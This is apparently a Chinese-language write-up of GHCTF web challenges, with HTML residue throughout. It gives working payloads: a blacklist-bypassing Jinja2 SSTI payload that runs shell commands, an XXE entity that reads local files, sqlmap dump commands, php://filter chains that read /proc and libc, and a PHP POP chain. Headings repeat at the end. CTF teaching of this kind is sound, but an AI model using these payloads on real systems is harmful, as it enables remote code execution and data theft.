GHCTF Web题目详细解析与利用技术教学<\/h1>

1. SSTI漏洞利用<\/h2>

漏洞分析<\/h3>

题目提供了一个文件上传功能，上传的文件内容会被渲染，存在服务器端模板注入(SSTI)漏洞。<\/p>

关键代码：<\/p>

def<\/span> contains_dangerous_keywords<\/span>(file_path):
<\/span><\/span>    dangerous_keywords =<\/span> ['_'<\/span>, 'os'<\/span>, 'subclasses'<\/span>, '__builtins__'<\/span>, '__globals__'<\/span>,'flag'<\/span>,]
<\/span><\/span>    with<\/span> open(file_path, 'rb'<\/span>) as<\/span> f:
<\/span><\/span>        file_content =<\/span> str(f.<\/span>read())
<\/span><\/span>        for<\/span> keyword in<\/span> dangerous_keywords:
<\/span><\/span>            if<\/span> keyword in<\/span> file_content:
<\/span><\/span>                return<\/span> True<\/span>
<\/span><\/span>    return<\/span> False<\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/h3>
使用fenjing<\/code>工具生成绕过黑名单的payload：<\/p>
from<\/span> fenjing import<\/span> exec_cmd_payload, config_payload
<\/span><\/span>import<\/span> logging
<\/span><\/span>
<\/span><\/span>logging.<\/span>basicConfig(level =<\/span> logging.<\/span>INFO)
<\/span><\/span>
<\/span><\/span>def<\/span> waf<\/span>(s: str):
<\/span><\/span>    dangerous_patterns =<\/span> ['_'<\/span>, 'os'<\/span>, 'subclasses'<\/span>, '__builtins__'<\/span>, '__globals__'<\/span>,'flag'<\/span>,]
<\/span><\/span>    for<\/span> pattern in<\/span> dangerous_patterns:
<\/span><\/span>        if<\/span> pattern in<\/span> s:
<\/span><\/span>            return<\/span> False<\/span>
<\/span><\/span>    return<\/span> True<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    shell_payload, _ =<\/span> exec_cmd_payload(waf, "ls"<\/span>)
<\/span><\/span>    print(shell_payload)
<\/span><\/span><\/code><\/pre>有效payload<\/h3>
{%set pi='so'[::-1]%}{%set ts=lipsum|escape|batch(22)|first|last%}{%set gl=ts*2+'globals'+ts*2%}{%set bu=ts*2+'builtins'+ts*2%}{%set im=ts*2+'import'+ts*2%}{{g.pop[gl][bu][im](pi).popen('ls').read()}}
<\/code><\/pre>
利用步骤<\/h3>

上传包含payload的文件<\/li>
访问\/file\/文件名<\/code>路径触发渲染<\/li>
获取命令执行结果<\/li>
<\/ol>
2. XXE漏洞利用<\/h2>
漏洞分析<\/h3>
题目提供了一个XML解析接口，未禁用外部实体引用。<\/p>
关键代码：<\/p>
@app<\/span>.<\/span>route('\/ghctf'<\/span>,methods=<\/span>['POST'<\/span>])
<\/span><\/span>def<\/span> parse<\/span>():
<\/span><\/span>    xml=<\/span>request.<\/span>form.<\/span>get('xml'<\/span>)
<\/span><\/span>    parser =<\/span> etree.<\/span>XMLParser(load_dtd=<\/span>True<\/span>, resolve_entities=<\/span>True<\/span>)
<\/span><\/span>    root =<\/span> etree.<\/span>fromstring(xml, parser)
<\/span><\/span>    name=<\/span>root.<\/span>find('name'<\/span>).<\/span>text
<\/span><\/span>    return<\/span> name or<\/span> None<\/span>
<\/span><\/span><\/code><\/pre>利用方法<\/h3>
构造包含外部实体引用的XML文档：<\/p>
URL编码payload：<\/p>
%3c%21%44%4f%43%54%59%50%45%20%74%65%73%74%20%5b%0d%0a%20%20%20%20%3c%21%45%4e%54%49%54%59%20%78%78%65%20%53%59%53%54%45%4d%20%22%66%69%6c%65%3a%2f%2f%2f%66%6c%61%67%22%3e%0d%0a%5d%3e%0d%0a%3c%72%6f%6f%74%3e%0d%0a%20%20%20%20%3c%6e%61%6d%65%3e%26%78%78%65%3b%3c%2f%6e%61%6d%65%3e%0d%0a%3c%2f%72%6f%6f%74%3e
<\/code><\/pre>
解码后：<\/p>
<!DOCTYPE test [
<\/span><\/span><\/span>    <!ENTITY xxe SYSTEM "file:\/\/\/flag"><\/span>
<\/span><\/span>]>
<\/span><\/span><root><\/span>
<\/span><\/span>    <name><\/span>&xxe;<\/name><\/span>
<\/span><\/span><\/root><\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

向\/ghctf<\/code>发送POST请求<\/li>
在xml<\/code>参数中传入恶意XML<\/li>
获取文件内容<\/li>
<\/ol>
3. SQLite注入<\/h2>
漏洞分析<\/h3>
题目存在SQLite数据库注入漏洞。<\/p>
利用方法<\/h3>
直接使用sqlmap工具进行自动化注入：<\/p>
sqlmap -u "目标URL" --dbs
sqlmap -u "目标URL" -D 数据库名 --tables
sqlmap -u "目标URL" -D 数据库名 -T 表名 --dump
<\/code><\/pre>
4. 文件读取漏洞<\/h2>
漏洞分析<\/h3>
题目存在文件读取功能，可以通过路径遍历读取系统文件。<\/p>
利用方法<\/h3>

读取\/proc\/self\/maps<\/code>获取内存布局：<\/li>
<\/ol>
php:\/\/filter\/convert.base64-encode\/resource=\/proc\/self\/maps
<\/code><\/pre>

读取libc文件：<\/li>
<\/ol>
php:\/\/filter\/convert.base64-encode\/resource=\/lib\/x86_64-linux-gnu\/libc-2.31.so
<\/code><\/pre>

使用复杂过滤器绕过限制：<\/li>
<\/ol>
php:\/\/filter\/read=zlib.inflate|zlib.inflate|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.UTF-8.ISO-2022-CN-EXT|convert.quoted-printable-decode|convert.iconv.latin1.latin1\/resource=data:text\/plain;base64,{base64编码的payload}
<\/code><\/pre>
5. 反序列化漏洞(POP链构造)<\/h2>
漏洞分析<\/h3>
题目存在PHP对象注入漏洞，需要构造特定的POP链。<\/p>
利用方法<\/h3>

分析源代码，找到可利用的类和方法<\/li>
构造POP链利用Mystery<\/code>类<\/li>
通过SplFileObject<\/code>读取文件<\/li>
<\/ol>
关键点：<\/p>

利用array_walk<\/code>函数遍历对象属性<\/li>
通过__get<\/code>魔术方法触发文件操作<\/li>
使用FilesystemIterator<\/code>遍历文件系统<\/li>
<\/ul>
示例POP链<\/h3>
$f =<\/span> new<\/span> Mystery<\/span>();
<\/span><\/span>$f-><\/span>SplFileObject<\/span> =<\/span> "..\/..\/..\/flag44545615441084"<\/span>;
<\/span><\/span><\/code><\/pre>总结<\/h2>

SSTI漏洞<\/strong>：重点在于绕过关键字过滤，使用字符串操作和属性链式访问<\/li>
XXE漏洞<\/strong>：利用外部实体引用读取系统文件<\/li>
SQL注入<\/strong>：使用自动化工具快速利用<\/li>
文件读取<\/strong>：结合过滤器链和路径遍历读取敏感文件<\/li>
反序列化<\/strong>：分析类结构，构造属性访问链<\/li>
<\/ol>
每种漏洞类型都有其特定的利用场景和防御方法，在实际渗透测试中需要根据具体情况选择合适的利用方式。<\/p>

GHCTF Web题目详细解析与利用技术教学<\/h1>

1. SSTI漏洞利用<\/h2>

2. XXE漏洞利用<\/h2>

3. SQLite注入<\/h2>

漏洞分析<\/h3> 题目存在SQLite数据库注入漏洞。<\/p>

4. 文件读取漏洞<\/h2>

漏洞分析<\/h3> 题目存在文件读取功能，可以通过路径遍历读取系统文件。<\/p>

5. 反序列化漏洞(POP链构造)<\/h2>

漏洞分析<\/h3> 题目存在PHP对象注入漏洞，需要构造特定的POP链。<\/p>

漏洞分析<\/h3>
题目存在SQLite数据库注入漏洞。<\/p>

漏洞分析<\/h3>
题目存在文件读取功能，可以通过路径遍历读取系统文件。<\/p>

漏洞分析<\/h3>
题目存在PHP对象注入漏洞，需要构造特定的POP链。<\/p>